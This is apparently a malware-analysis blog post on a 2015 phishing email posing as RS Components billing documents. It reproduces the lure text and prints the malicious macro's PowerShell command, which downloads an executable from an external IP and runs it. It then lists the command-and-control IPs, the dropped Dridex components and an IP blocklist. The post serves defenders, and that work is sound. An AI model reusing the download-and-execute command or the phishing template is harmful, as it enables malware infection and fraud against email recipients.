---------------------------------------------------------------
From: Earlene Carlson
Date: 31 March 2015 at 11:30
Subject: 83433-Your Latest Documents from RS Components 659751716
Helping you get your job done. You've received this email as a customer of rswww.com. |
Dear Customer, Please find attached your latest document(s) from RS.
For all account queries please contact RS Customer Account Services. Tel: 01536 752867 Fax: 01536 542205 Email: rpdf.billing@colt.net (subject box to read DOC eBilling) If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following: Tel: 0333 8727520 Email: customers@colt.net Kind regards, RS Customer Account Services. This service is provided by Swiss Post Solutions on behalf of RS Components. |
RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK. Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867. |
---------------------------------------------------------------
The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).
There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.
Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.
UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:
188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)
It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.
Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169